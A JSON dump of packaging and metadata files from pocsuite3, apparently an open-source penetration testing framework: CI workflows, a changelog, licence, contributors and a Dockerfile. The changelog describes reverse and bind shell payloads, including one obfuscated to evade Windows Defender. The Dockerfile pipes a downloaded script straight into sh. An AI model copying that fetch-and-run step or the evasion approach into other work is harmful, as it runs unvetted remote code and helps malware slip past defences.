[ { "path": ".coveragerc", "content": "[run]\ninclude = pocsuite3/*\nomit =\n *migrations*\n *tests*\n venv/*\n\n[report]\ninclude = pocsuite3/*\nomit =\n *migrations*\n *tests*\n venv/*\nexclude_lines =\n pragma: no cover\n def __repr__\n def __str__\n if self.debug:\n if settings.DEBUG\n raise AssertionError\n raise NotImplementedError\n if __name__ == .__main__.:\n" }, { "path": ".github/workflows/lint.yml", "content": "name: Lint\non: [pull_request]\n\njobs:\n lint:\n strategy:\n matrix:\n python-version: ['3.10']\n os: [ubuntu-latest]\n runs-on: ${{ matrix.os }}\n timeout-minutes: 30\n steps:\n - uses: actions/checkout@v2\n - name: Cache for pip\n uses: actions/cache@v1\n id: cache-pip\n with:\n path: ~/.cache/pip\n key: ${{ matrix.os }}-cache-pip\n\n - name: Set up Python ${{ matrix.python-version }}\n uses: actions/setup-python@v1\n with:\n python-version: ${{ matrix.python-version }}\n\n - name: Critical lint\n run: |\n pip install flake8\n # https://michaelcurrin.github.io/dev-cheatsheets/cheatsheets/python/linting/flake8.html\n flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics\n\n - name: Style lint\n run: |\n flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --ignore=C901,W503,W504,E741 --statistics > current.txt\n git fetch origin\n git checkout origin/\"$GITHUB_BASE_REF\"\n flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --ignore=C901,W503,W504,E741 --statistics > base.txt\n if diff base.txt current.txt | grep \"^> ./\"; then\n false\n fi\n" }, { "path": ".github/workflows/pylint.yml", "content": "name: PyLint\non: [pull_request]\n\njobs:\n pylint:\n strategy:\n matrix:\n python-version: ['3.10']\n os: [ubuntu-latest]\n runs-on: ${{ matrix.os }}\n timeout-minutes: 30\n steps:\n - uses: actions/checkout@v2\n - name: Cache for pip\n uses: actions/cache@v1\n id: cache-pip\n with:\n path: ~/.cache/pip\n key: ${{ matrix.os }}-cache-pip\n\n - name: Set up Python ${{ matrix.python-version }}\n uses: actions/setup-python@v1\n with:\n python-version: ${{ matrix.python-version }}\n\n - name: PyLint\n run: |\n set -x\n pip install pylint\n pip install --upgrade -r requirements.txt\n # TODO: donot ignore serialization.py\n pylint --exit-zero --errors-only --ignore=serialization.py pocsuite3 > current.txt\n git fetch origin\n git checkout origin/\"$GITHUB_BASE_REF\"\n pylint --exit-zero --errors-only --ignore=serialization.py pocsuite3 > base.txt\n if diff base.txt current.txt | grep \"^> \"; then\n false\n fi\n" }, { "path": ".github/workflows/release.yml", "content": "name: Release Package\n\non:\n push:\n tags:\n - v*\n\njobs:\n pypi:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v3\n - name: Set up Python\n uses: actions/setup-python@v3\n with:\n python-version: '3.x'\n - name: Install dependencies\n run: |\n python -m pip install --upgrade pip\n pip install build\n - name: Build package\n run: python -m build\n - name: Publish package\n uses: pypa/gh-action-pypi-publish@27b31702a0e7fc50959f5ad993c78deac1bdfc29\n with:\n user: __token__\n password: ${{ secrets.PYPI_API_TOKEN }}\n\n homebrew:\n runs-on: ubuntu-latest\n needs:\n - pypi\n steps:\n - name: Update Homebrew formula\n uses: 13ph03nix/action-homebrew-bump-formula@v3\n with:\n token: ${{ secrets.BREW_TOKEN }}\n formula: pocsuite3\n\n aur:\n runs-on: ubuntu-latest\n needs:\n - pypi\n steps:\n - name: Checkout PKGBUILD repo\n run: |\n echo \"$AUR_SSH_KEY\" > ~/aur_ssh_key\n chmod 600 ~/aur_ssh_key\n git config --global core.sshCommand \"ssh -i ~/aur_ssh_key -o 'StrictHostKeyChecking=no'\"\n git clone \"aur@aur.archlinux.org:pocsuite3.git\" .\n env:\n AUR_SSH_KEY: ${{ secrets.AUR_SSH_KEY }}\n - name: Update Version\n run: |\n export VERSION=$(echo $GH_REF | sed 's:refs/tags/v::')\n sed -i \"s/^pkgver=.*\\$/pkgver=${VERSION}/g\" PKGBUILD\n sed -i \"s/^pkgrel=.*\\$/pkgrel=1/g\" PKGBUILD\n env:\n GH_REF: ${{ github.ref }}\n - name: Update .SRCINFO and checksum\n uses: 13ph03nix/archlinux-package-action@v2 \n with:\n flags: ''\n namcap: false\n updpkgsums: true\n srcinfo: true\n - name: Commit and push changes\n run: |\n export VERSION=$(echo $GH_REF | sed 's:refs/tags/v::')\n git config --global user.email \"abcnsxyz@gmail.com\"\n git config --global user.name '13ph03nix'\n git commit -a -m \"Version ${VERSION} (automated version bump)\"\n git push origin master\n env:\n GH_REF: ${{ github.ref }}\n\n dockerhub:\n runs-on: ubuntu-latest\n needs:\n - pypi\n steps:\n - name: Checkout\n uses: actions/checkout@v2\n - name: Build\n env:\n GH_REF: ${{ github.ref }}\n run: |\n export VERSION=$(echo $GH_REF | sed 's:refs/tags/v::')\n docker build --build-arg version=${VERSION} \\\n --tag pocsuite3/pocsuite3:v${VERSION} \\\n --tag pocsuite3/pocsuite3:latest \\\n .\n - name: Login\n uses: docker/login-action@v1\n with:\n username: ${{ secrets.DOCKER_USERNAME }}\n password: ${{ secrets.DOCKER_PASSWORD }} \n - name: Push\n run: |\n docker push -a pocsuite3/pocsuite3\n" }, { "path": ".github/workflows/test.yml", "content": "name: Test\non: [pull_request]\n\njobs:\n test:\n strategy:\n matrix:\n python-version: ['3.9', '3.11']\n os: [ubuntu-latest, macos-latest, windows-latest]\n runs-on: ${{ matrix.os }}\n timeout-minutes: 30\n steps:\n - uses: actions/checkout@v4\n - name: Cache for pip\n uses: actions/cache@v4\n id: cache-pip\n with:\n path: ~/.cache/pip\n key: ${{ matrix.os }}-cache-pip\n\n - name: Set up Python ${{ matrix.python-version }}\n uses: actions/setup-python@v4\n with:\n python-version: ${{ matrix.python-version }}\n\n - name: Install dependencies & Test\n run: |\n pip install --upgrade pip\n pip install --upgrade setuptools\n pip install --upgrade -r requirements.txt\n python setup.py install\n python test.py" }, { "path": ".gitignore", "content": "### OSX ###\n.DS_Store\n.AppleDouble\n.LSOverride\n\n### SublimeText ###\n# cache files for sublime text\n*.tmlanguage.cache\n*.tmPreferences.cache\n*.stTheme.cache\n\n# workspace files are user-specific\n*.sublime-workspace\n\n# project files should be checked into the repository, unless a significant\n# proportion of contributors will probably not be using SublimeText\n# *.sublime-project\n\n# sftp configuration file\nsftp-config.json\n\n# Basics\n*.py[cod]\n__pycache__\n\n# Logs\nlogs\n*.log\npip-log.txt\nnpm-debug.log*\n\n# Unit test / coverage reports\n.coverage\n.tox\nnosetests.xml\nhtmlcov\n\n# Translations\n*.mo\n*.pot\n\n# Pycharm\n.idea/\n\n# Vim\n\n*~\n*.swp\n*.swo\n\n# npm\nnode_modules/\n\n# Compass\n.sass-cache\n\n# virtual environments\nenv/\n.env\nvenv36/\nvenv/\n\n# vscode\n.vscode/\n\n# wakatime\n.wakatime-project\n\n# other\nbuild/\ndist/\n*.egg-info\n.eggs/\npocsuite.ini\npocsuite3/pocs/\npocsuite3/data/cacert.pem\n" }, { "path": "CHANGELOG.md", "content": "# version 2.1.0\n----------------\n * fix codes ignored in raw strings #432\n * update zoomeye api to v2\n\n# verison 2.0.8\n * Fix nucleic dsl syntax parsing #386 @xixixiba\n * Fix the compatibility issue of -l command in windows #400 @geelph\n\n# version 2.0.7\n * add http debug level command line parameter --http-debug\n * fix some bug\n\n# version 2.0.6\n* add new command -l show local poc\n* build the corresponding vulnerability environment based on the PoC, For details, please refer to pocs/Apache_Struct2\n\n# version 2.0.5\n----------------\n* fix hook failure due to urllib3 update #368 #373\n* optimize DSL expression execution #372\n* making mmh3 an optional dependency #359\n* disable mandatory updates\n\n# version 2.0.4\n----------------\n* Updated protocol names that are compatible with Nuclei v2.9.1\n\n# version 2.0.3\n----------------\n* optimized URL protocol correction #356, thanks @chenjiewei123\n* support disable protocol correction and honeypot checks through --no-check option\n\n# version 2.0.2\n----------------\n* fix url redirect problem in _check method #337\n* fix use command in console mode can't use absolute path #341, thanks @S2eTo\n* fix ipv6 compatibility issue in build_url #347, thanks @HomerQing\n* optimize dsl expression execution #348\n\n# version 2.0.1\n----------------\n* fix words matcher expression execution #333, thanks @soapffz\n* fix catch binascii ValueError Exception #334, thanks @izj007\n* improve template robustness\n* support digest_username and digest_password\n* support negative matchers\n\n# version 2.0.0\n----------------\n* yaml poc support, compatible with nuclei\n* fix httpserver module hangs on macos platform\n* auto correction of url protocol based on status code\n\n# version 1.9.11\n----------------\n* support customize poc protocol and default port #321\n* -p option support optional protocol field, [proto:]port #323\n* add -s option to skip target default port #323\n* poc-console optimization\n* some bug fixes & improvements\n\n# version 1.9.10\n----------------\nfix different python versions have different behaviors on ipaddress library #319\n\n# version 1.9.9\n----------------\n* auto correct url based on poc's protocol attribute #316\n* fix Colorizing doesn't work on Windows with poc-console #318\n* trail slash at the end of url #314\n\n# version 1.9.8\n----------------\n* support full PoC search by regex keyword #312\n* set default value for PoC in POCBase #312\n* add bind/reverse shell payload #311\n* fix fofa query over multiple pages #310\n\n# version 1.9.7\n----------------\n* improve encoding compatibility #305\n* obfuscate REVERSE_PAYLOAD to evade windows defender #306\n* improve --ppt\n\n# version 1.9.6\n----------------\n* support -o parameter, save the result in json lines format\n* optimize timeout for cyberspace search engine plugins\n* optimize the handling of the url protocol\n* docs update\n\n# version 1.9.5\n----------------\n* refactor --ppt, optimize mosaic for url\n* optimize poc template\n* optimize pocsuite command default prompt message\n* adjust the default timeout to 10 seconds\n* adjust the default number of threads to 150\n* target url support cidr, user can use -p provide additional ports\n* support local mode, local mode do not need any targets, e.g. LPE\n* bug fixes\n\n# version 1.9.4\n-----------------\n* support poc template generate\n* support custom interactsh server\n* Switch the authentication method of ZoomEye and CEYE to API-KEY\n* support honeypot detect\n* support http/https protocol autocorrect\n* refactor --update\n* support version check\n\n# version 1.9.3\n-----------------\n* add support for qianxin hunter cyberspace search engine\n* support self.rhost & self.rport in POCBase\n\n# version 1.9.2\n-----------------\n* Improved shell mode\n\n# version 1.9.1\n-----------------\n* fix #272, #274\n* the hook support of requests can be used alone\n* refactor shell mode, add handle for keyboard interrupt\n\n# version 1.9.0\n-----------------\n* Fix urllib3 issue with parsing URIs\n* Prevent URL encoding\n\n# version 1.8.12\n-----------------\n* update fofa api url #263\n\n# version 1.8.11\n-----------------\n* fix windows log color issue #258\n\n# version 1.8.10\n-----------------\n* fix #254\n* fix urlparse fails with simple url\n* use pycryptodomex instead of pycryptodome, fix #255\n\n# version 1.8.9\n-----------------\n* fix user-agent bug #252\n\n# version 1.8.8\n-----------------\n* rewrite multi module\n* integrate with interactsh\n* support filter poc by keyword\n\n# version 1.8.7\n-----------------\n* fix bug\n* optimize code style & docs\n* delete the exe tool for compatibility with dfsg\n\n# version 1.8.6\n-----------------\n* support encrypted shell (TLS) in shell mode\n* fix #228\n\n# version 1.8.5\n-----------------\n* support bind shell in shell mode\n* fix #221\n\n# version 1.8.4\n-----------------\n* update docs\n* fix typo\n\n# version 1.8.3\n-----------------\n* some improvements related to dependent\n\n# version 1.8.2\n-----------------\n* fix finding a python module version gives error\n\n# version 1.8.1\n-----------------\n* fix check_requires() can not handle dependent version correctly #208\n* update docs\n\n# version 1.8.0\n-----------------\n* fix the timeout problem in shell mode leads to confusing results\n* made some improvements with network address related issues\n\n# version 1.7.8\n-----------------\n* add option to display extra parameters of poc\n* add more poc attribute to result dict\n* allow custom module path in console mode\n* fix some compatibility problems\n\n# version 1.7.7\n-----------------\n* 添加--dork自动用poc中的dork字段扫描功能\n* 适配Debian源格式需求\n\n# version 1.7.6\n-----------------\n* fixes #192\n\n# version 1.7.5\n-----------------\n* 添加录包功能和dork字段支持base64编码 fixes #169 #173\n* 修复target插件requests参数无效bug fix #183\n\n# version 1.7.4\n-----------------\n* 修复批量执行poc时因为报错导致扫描中断问题 fixes #149\n* 修复--pocs-path参数bug\n\n# version 1.7.2\n-----------------\n* 增加powershell bash反弹shell 以及编码函数\n\n# version 1.7.0\n-----------------\n* 修复`Python 3.9`兼容性问题\n* console模式,添加系统命令执行,添加pocuite3命令clear清除屏幕\n\n# version 1.6.5\n----------------\n* 修复http请求头不能删除\n* 修复html导出编码错误\n* 修复console模式下lport设置失败\n* shell模式可以使用select或use选择shell\n\n# version 1.6.4\n----------------\n* 测试Github Action自动发布pypi\n\n# version 1.6.0~1.6.3\n---------------\n* 添加随机UA头选项\n* 重构--ppt隐藏信息选项\n* 当poc有语法错误时,显示详细信息\n* 添加InMemoryWar\n* 修复urllib3的`chunk_length`错误\n* 加入打tag自动构建发布到pypi\n\n# version 1.5.9\n---------------\n* 增加了poc类型的枚举类型 #95\n* 修改了样例poc\n\n# version 1.5.8\n---------------\n* 修复shadon api问题\n* 加入fofa api接口\n\n# version 1.5.7\n---------------\n* 取消pyreadline报错提示\n* 修改日志拼写错误\n\n# version 1.5.6\n---------------\n* 修复多线程卡住问题\n* 修复seebug api问题\n* 修复socks5代理问题\n\n# version 1.5.5\n---------------\n* fix #87\n\n# version 1.5.4\n---------------\n* 加入获取PoC信息的API\n* 更新测试用例\n\n# version 1.5.3\n---------------\n* socket代理增加变量保存原始socket信息,方便使用后恢复(`conf.origin_socks`)\n* 修复requests代理指定为None时的逻辑问题\n\n# version 1.5.2\n---------------\n* typo fix #84\n* bugfix 自定义cookie产生的异常情况\n* bugfix 引入pocsuite3后再次引入requests导致的报错\n\n# version 1.5.1\n---------------\n* 修复插件调用poc失败的问题\n\n# version 1.5.0\n---------------\n* 修复timeout一处异常\n* pocsuite3.api 添加 `random_str`\n* 优化update function\n\n# version 1.4.9\n---------------\n* 修复requirement检测一处bug\n* 修复reverse 一处异常\n\n# version 1.4.8\n---------------\n* console模式下设置ip可以选择序号 `show ip` `set lhost 0`\n* bugfix for ceye dns api\n\n# version 1.4.7\n---------------\n* 修复console模式下回连shell循环的异常\n\n# version 1.4.6\n---------------\n* 修复`-v`出现的问题\n* 修复加载多个poc可能出现的问题\n\n# version 1.4.5\n---------------\n* update usage.md\n\n# version 1.4.3\n---------------\n* 加入PPT模式(用于演示,敏感信息将打上*)\n\n# version 1.4.2\n---------------\n* 修复console模式下一处bug,https://github.com/knownsec/pocsuite3/pull/61\n\n# version 1.4.1\n---------------\n* 修复由poc插件中由conf.poc引起的错误\n\n# version 1.4.0\n---------------\n* 在命令行下url和poc支持多个(空格分隔)\n* 更换`optparse`到`argparse`\n\n# version 1.3.9\n---------------\n* 修复plugins选项加载绝对路径问题\n* 修复加载pocs目录扫描部分报错问题\n* PoC插件`add_poc`方法新增`fullname`参数用于定义加载poc名称\n* 定义api模式方便shell集成\n\n# version 1.3.8\n---------------\n* add field,option for compatibility with zipoc\n\n# version 1.3.7\n---------------\n* add poc-plugin to load poc from `pocs` directories.\n\n# version 1.3.6\n---------------\n* Bugfix parameter `version`\n\n# version 1.3.5\n---------------\n* Add parameter `-c` for load configuration from the configuration file\n* Add parameter `--comparsion` for comparing comparing both of zoomeye and shodan\n* Interface supports from zoomeye,shodan and censys\n\n# version 1.3.4\n---------------\nCross-platform shell code generation\n\n# version 1.3.3\n---------------\nfix #37 pocsuite3\\lib\\core\\revision.py\n\n# version 1.3.2\n---------------\n* bugfix poc thinkphp_rce\n\n# version 1.3.1\n---------------\n* add confluence poc\n* fix pocs/drupalgeddon2\n* CYGWIN compatibility\n* bugfix revision.py `stdout_encode`\n\n# version 1.3.0\n---------------\n* new feature: `_verify` `_attack` function can directly return bool, str, dict, etc.\n* new plugin: file report\n* bugfix get_option() not support int\n\n# version 1.2.10\n---------------\n* bugfix interpreter_option OptDict\n\n# version 1.2.9\n---------------\n* seebug poc friendly load reminder\n* new feature:displayed results after user interruption\n* POC specifies third-party module verification failure\n* customize option iter func\n* Built-in http server\n\n# version 1.2.8\n---------------\n* support ceye token\n* bugfix plugin from seebug\n* refactoring ceye\n\n# version 1.2.7\n---------------\n* bugfix hook_requests\n\n# version 1.2.6\n---------------\n* bugfix seebug poc\n\n# version 1.2.5\n---------------\n* bugfix socks proxy\n\n# version 1.2.2\n---------------\n* bugfix site-packages poc-console issue\n* poc-console support to load absolute path\n* poc-console will ignore case when use `search`\n\n# version 1.2.1\n---------------\n* bugfix auto update error\n* bugfix console mode load poc error\n* update pocsuite3 banner\n\n# version 1.0\n---------------\n* Init publish\n" }, { "path": "CONTRIBUTORS.md", "content": "hysia \n* for contributing core code\n\nbadcode \n* for contributing core code\n\ncc \n* for contributing core code\n\nw7ay \n* for contributing core code\n\nfenix \n* for contributing core code\n\nphithon \n* for suggesting a couple of features\n\nlongofo\n* for contributing http server module\n\nRo0tk1t \n* for contributing multi-ip multi-poc execution features\n* fix some issues\n\nhawoosec \n* for reporting a bug\n* for contributing a minor patch\n* bugfix invalid client\n* for contributing `set lhost index`\n\nExplorer1092 \n* update usage.md\n\ngsfish \n* good first issue #85\n* repair the custom cookie anomalies\n\nBecivells \n* bugfix shodan api\n* for contributing fofa api\n* for contributing random user-agent switch\n* bugfix #187\n\nhex0wn \n* bugfix #139\n\nMrMetatron \n* console 模式,添加系统命令执行,添加 pocsuite3 命令 clear 清除屏幕功能\n\nz3r0yu \n* Add quake dork for pocsuite3\n\nRook1e \n* Add CI to build and push Docker image to DockerHub\n\nekszz \n* contributing to customize poc protocol and default port #321\n\nHomerQing \n* contributing to fix ipv6 compatibility issue in build_url\n\nXxcdd \n* Add support for requests session reuse\n* Add support for web hook\n" }, { "path": "COPYING", "content": "COPYING -- Describes the terms under which pocsuite is distributed. A copy\nof the GNU General Public License (GPL) is appended to this file.\n\npocsuite3 is (C) 2014-present 404-team@knownsec.com\n\nThis program is free software; you may redistribute and/or modify it under\nthe terms of the GNU General Public License as published by the Free\nSoftware Foundation; Version 2 with the clarifications and\nexceptions described below. This guarantees your right to use, modify, and\nredistribute this software under certain conditions. If you wish to embed\npocsuite technology into proprietary software, we sell alternative licenses\n(contact pocsuite@seebug.org).\n\n\n****************************************************************************\n\n GNU GENERAL PUBLIC LICENSE\n Version 2, June 1991\n\n Copyright (C) 1989, 1991 Free Software Foundation, Inc.,\n 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n Preamble\n\n The licenses for most software are designed to take away your\nfreedom to share and change it. By contrast, the GNU General Public\nLicense is intended to guarantee your freedom to share and change free\nsoftware--to make sure the software is free for all its users. This\nGeneral Public License applies to most of the Free Software\nFoundation's software and to any other program whose authors commit to\nusing it. (Some other Free Software Foundation software is covered by\nthe GNU Lesser General Public License instead.) You can apply it to\nyour programs, too.\n\n When we speak of free software, we are referring to freedom, not\nprice. Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthis service if you wish), that you receive source code or can get it\nif you want it, that you can change the software or use pieces of it\nin new free programs; and that you know you can do these things.\n\n To protect your rights, we need to make restrictions that forbid\nanyone to deny you these rights or to ask you to surrender the rights.\nThese restrictions translate to certain responsibilities for you if you\ndistribute copies of the software, or if you modify it.\n\n For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must give the recipients all the rights that\nyou have. You must make sure that they, too, receive or can get the\nsource code. And you must show them these terms so they know their\nrights.\n\n We protect your rights with two steps: (1) copyright the software, and\n(2) offer you this license which gives you legal permission to copy,\ndistribute and/or modify the software.\n\n Also, for each author's protection and ours, we want to make certain\nthat everyone understands that there is no warranty for this free\nsoftware. If the software is modified by someone else and passed on, we\nwant its recipients to know that what they have is not the original, so\nthat any problems introduced by others will not reflect on the original\nauthors' reputations.\n\n Finally, any free program is threatened constantly by software\npatents. We wish to avoid the danger that redistributors of a free\nprogram will individually obtain patent licenses, in effect making the\nprogram proprietary. To prevent this, we have made it clear that any\npatent must be licensed for everyone's free use or not licensed at all.\n\n The precise terms and conditions for copying, distribution and\nmodification follow.\n\n GNU GENERAL PUBLIC LICENSE\n TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n 0. This License applies to any program or other work which contains\na notice placed by the copyright holder saying it may be distributed\nunder the terms of this General Public License. The \"Program\", below,\nrefers to any such program or work, and a \"work based on the Program\"\nmeans either the Program or any derivative work under copyright law:\nthat is to say, a work containing the Program or a portion of it,\neither verbatim or with modifications and/or translated into another\nlanguage. (Hereinafter, translation is included without limitation in\nthe term \"modification\".) Each licensee is addressed as \"you\".\n\nActivities other than copying, distribution and modification are not\ncovered by this License; they are outside its scope. The act of\nrunning the Program is not restricted, and the output from the Program\nis covered only if its contents constitute a work based on the\nProgram (independent of having been made by running the Program).\nWhether that is true depends on what the Program does.\n\n 1. You may copy and distribute verbatim copies of the Program's\nsource code as you receive it, in any medium, provided that you\nconspicuously and appropriately publish on each copy an appropriate\ncopyright notice and disclaimer of warranty; keep intact all the\nnotices that refer to this License and to the absence of any warranty;\nand give any other recipients of the Program a copy of this License\nalong with the Program.\n\nYou may charge a fee for the physical act of transferring a copy, and\nyou may at your option offer warranty protection in exchange for a fee.\n\n 2. You may modify your copy or copies of the Program or any portion\nof it, thus forming a work based on the Program, and copy and\ndistribute such modifications or work under the terms of Section 1\nabove, provided that you also meet all of these conditions:\n\n a) You must cause the modified files to carry prominent notices\n stating that you changed the files and the date of any change.\n\n b) You must cause any work that you distribute or publish, that in\n whole or in part contains or is derived from the Program or any\n part thereof, to be licensed as a whole at no charge to all third\n parties under the terms of this License.\n\n c) If the modified program normally reads commands interactively\n when run, you must cause it, when started running for such\n interactive use in the most ordinary way, to print or display an\n announcement including an appropriate copyright notice and a\n notice that there is no warranty (or else, saying that you provide\n a warranty) and that users may redistribute the program under\n these conditions, and telling the user how to view a copy of this\n License. (Exception: if the Program itself is interactive but\n does not normally print such an announcement, your work based on\n the Program is not required to print an announcement.)\n\nThese requirements apply to the modified work as a whole. If\nidentifiable sections of that work are not derived from the Program,\nand can be reasonably considered independent and separate works in\nthemselves, then this License, and its terms, do not apply to those\nsections when you distribute them as separate works. But when you\ndistribute the same sections as part of a whole which is a work based\non the Program, the distribution of the whole must be on the terms of\nthis License, whose permissions for other licensees extend to the\nentire whole, and thus to each and every part regardless of who wrote it.\n\nThus, it is not the intent of this section to claim rights or contest\nyour rights to work written entirely by you; rather, the intent is to\nexercise the right to control the distribution of derivative or\ncollective works based on the Program.\n\nIn addition, mere aggregation of another work not based on the Program\nwith the Program (or with a work based on the Program) on a volume of\na storage or distribution medium does not bring the other work under\nthe scope of this License.\n\n 3. You may copy and distribute the Program (or a work based on it,\nunder Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you also do one of the following:\n\n a) Accompany it with the complete corresponding machine-readable\n source code, which must be distributed under the terms of Sections\n 1 and 2 above on a medium customarily used for software interchange; or,\n\n b) Accompany it with a written offer, valid for at least three\n years, to give any third party, for a charge no more than your\n cost of physically performing source distribution, a complete\n machine-readable copy of the corresponding source code, to be\n distributed under the terms of Sections 1 and 2 above on a medium\n customarily used for software interchange; or,\n\n c) Accompany it with the information you received as to the offer\n to distribute corresponding source code. (This alternative is\n allowed only for noncommercial distribution and only if you\n received the program in object code or executable form with such\n an offer, in accord with Subsection b above.)\n\nThe source code for a work means the preferred form of the work for\nmaking modifications to it. For an executable work, complete source\ncode means all the source code for all modules it contains, plus any\nassociated interface definition files, plus the scripts used to\ncontrol compilation and installation of the executable. However, as a\nspecial exception, the source code distributed need not include\nanything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component\nitself accompanies the executable.\n\nIf distribution of executable or object code is made by offering\naccess to copy from a designated place, then offering equivalent\naccess to copy the source code from the same place counts as\ndistribution of the source code, even though third parties are not\ncompelled to copy the source along with the object code.\n\n 4. You may not copy, modify, sublicense, or distribute the Program\nexcept as expressly provided under this License. Any attempt\notherwise to copy, modify, sublicense or distribute the Program is\nvoid, and will automatically terminate your rights under this License.\nHowever, parties who have received copies, or rights, from you under\nthis License will not have their licenses terminated so long as such\nparties remain in full compliance.\n\n 5. You are not required to accept this License, since you have not\nsigned it. However, nothing else grants you permission to modify or\ndistribute the Program or its derivative works. These actions are\nprohibited by law if you do not accept this License. Therefore, by\nmodifying or distributing the Program (or any work based on the\nProgram), you indicate your acceptance of this License to do so, and\nall its terms and conditions for copying, distributing or modifying\nthe Program or works based on it.\n\n 6. Each time you redistribute the Program (or any work based on the\nProgram), the recipient automatically receives a license from the\noriginal licensor to copy, distribute or modify the Program subject to\nthese terms and conditions. You may not impose any further\nrestrictions on the recipients' exercise of the rights granted herein.\nYou are not responsible for enforcing compliance by third parties to\nthis License.\n\n 7. If, as a consequence of a court judgment or allegation of patent\ninfringement or for any other reason (not limited to patent issues),\nconditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License. If you cannot\ndistribute so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you\nmay not distribute the Program at all. For example, if a patent\nlicense would not permit royalty-free redistribution of the Program by\nall those who receive copies directly or indirectly through you, then\nthe only way you could satisfy both it and this License would be to\nrefrain entirely from distribution of the Program.\n\nIf any portion of this section is held invalid or unenforceable under\nany particular circumstance, the balance of the section is intended to\napply and the section as a whole is intended to apply in other\ncircumstances.\n\nIt is not the purpose of this section to induce you to infringe any\npatents or other property right claims or to contest validity of any\nsuch claims; this section has the sole purpose of protecting the\nintegrity of the free software distribution system, which is\nimplemented by public license practices. Many people have made\ngenerous contributions to the wide range of software distributed\nthrough that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing\nto distribute software through any other system and a licensee cannot\nimpose that choice.\n\nThis section is intended to make thoroughly clear what is believed to\nbe a consequence of the rest of this License.\n\n 8. If the distribution and/or use of the Program is restricted in\ncertain countries either by patents or by copyrighted interfaces, the\noriginal copyright holder who places the Program under this License\nmay add an explicit geographical distribution limitation excluding\nthose countries, so that distribution is permitted only in or among\ncountries not thus excluded. In such case, this License incorporates\nthe limitation as if written in the body of this License.\n\n 9. The Free Software Foundation may publish revised and/or new versions\nof the General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\nEach version is given a distinguishing version number. If the Program\nspecifies a version number of this License which applies to it and \"any\nlater version\", you have the option of following the terms and conditions\neither of that version or of any later version published by the Free\nSoftware Foundation. If the Program does not specify a version number of\nthis License, you may choose any version ever published by the Free Software\nFoundation.\n\n 10. If you wish to incorporate parts of the Program into other free\nprograms whose distribution conditions are different, write to the author\nto ask for permission. For software which is copyrighted by the Free\nSoftware Foundation, write to the Free Software Foundation; we sometimes\nmake exceptions for this. Our decision will be guided by the two goals\nof preserving the free status of all derivatives of our free software and\nof promoting the sharing and reuse of software generally.\n\n NO WARRANTY\n\n 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY\nFOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN\nOTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES\nPROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED\nOR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE\nPROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,\nREPAIR OR CORRECTION.\n\n 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR\nREDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,\nINCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING\nOUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED\nTO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY\nYOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER\nPROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGES.\n\n END OF TERMS AND CONDITIONS\n\n****************************************************************************\n" }, { "path": "Dockerfile", "content": "FROM ubuntu:22.04\nLABEL maintainer=\"Knownsec 404 Team\"\n\nARG version\nENV DEBIAN_FRONTEND=noninteractive\n\nRUN apt-get update \\\n && apt-get install -y \\\n python3 \\\n python3-pip \\\n net-tools \\\n nload \\\n htop \\\n tmux \\\n vim \\\n wget \\\n curl \\\n zsh \\\n && apt-get install -y sudo \\\n && useradd -m pocsuite3 \\\n && passwd --delete --unlock pocsuite3 \\\n && echo \"pocsuite3 ALL=(ALL:ALL) NOPASSWD: ALL\" > /etc/sudoers.d/pocsuite3\n\nUSER pocsuite3\n\nRUN sh -c \"$(wget -O- https://raw.githubusercontent.com/13ph03nix/zsh-in-docker/master/zsh-in-docker.sh)\" -- \\\n -t https://github.com/spaceship-prompt/spaceship-prompt \\\n -p git \\\n -p https://github.com/zsh-users/zsh-autosuggestions \\\n -p https://github.com/zsh-users/zsh-completions \\\n && sudo apt-get autoremove -y \\\n && sudo apt-get clean -y \\\n && sudo rm -rf /var/lib/apt/lists/*\n\nRUN sudo pip3 install --upgrade pip && sudo pip3 install --upgrade pocsuite3$([ -n \"$version\" ] && echo \"==\"${version})\n\nWORKDIR /home/pocsuite3\nCMD [\"zsh\"]\n" }, { "path": "MANIFEST.in", "content": "include MANIFEST.in\ninclude LICENSE\ninclude README.md\ninclude CHANGELOG.md\ninclude CONTRIBUTORS.md\nrecursive-include pocsuite3 